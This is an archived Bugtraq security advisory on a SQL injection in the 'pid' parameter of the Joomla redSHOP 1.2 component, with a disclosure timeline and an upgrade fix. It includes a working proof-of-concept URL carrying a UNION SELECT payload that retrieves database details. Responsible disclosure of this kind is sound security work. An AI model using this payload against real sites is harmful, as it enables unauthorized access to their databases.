Home page logo
/

bugtraq logo Bugtraq mailing list archives

Joomla! redSHOP component v1.2 SQL Injection
From: Matias Fontanini <matias.fontanini () gmail com>
Date: Thu, 8 Aug 2013 09:47:14 -0300

--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------

== Description ==
- Product: Joomla! redSHOP component
- Product link: http://redcomponent.com/redcomponent/redshop
- Vendor: redcomponent
- Affected versions: version 1.2 is vulnerable. Other versions might
be affected as well.
- Vulnerability discovered by: Matias Fontanini

== Vulnerability ==
When using the "addtocompare" task, the component does not correctly
sanitize the "pid" parameter before using it to construct SQL queries,
making it vulnerable to SQL Injection attacks.

The following proof of concept request retrieves the database user,
name and version:

http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422

== Solution ==
Upgrade the product to the 1.3 version.

== Report timeline ==
[2013-08-02] Vulnerability reported to vendor.
[2013-08-02] Developers answered back indicating that an update would
be released soon.
[2013-08-06] redSHOP 1.3 was released, which fixes the reported issue.
[2013-08-08] Public disclosure.


  By Date           By Thread  

Current thread:
  • Joomla! redSHOP component v1.2 SQL Injection Matias Fontanini (Aug 08)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault